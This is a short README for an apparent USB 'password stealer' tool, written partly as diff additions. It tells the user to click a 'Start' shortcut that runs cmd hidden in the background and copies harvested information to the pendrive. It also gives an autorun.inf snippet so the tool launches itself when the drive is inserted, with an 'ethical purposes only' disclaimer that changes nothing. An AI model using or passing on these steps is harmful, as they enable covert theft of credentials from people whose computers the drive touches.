UnkBrl/Password-Stealer-Pendrive/README.md

 https://i.imgur.com/44TPRS2.png

 To start the stealing process you just have to click the  Start  shortcut then cmd will be opened in background and will save all the information to your pendrive.

+TIP:

+To make pendrive autorun  Start  shortcut itself when inserted:

+Create a file name  autorun.inf  :

+      [autorun]
+      OPEN=XYZ.EXE

+NOTE:
+Use these programs for ethical purposes only.
+I am not responsible for any thing you do!!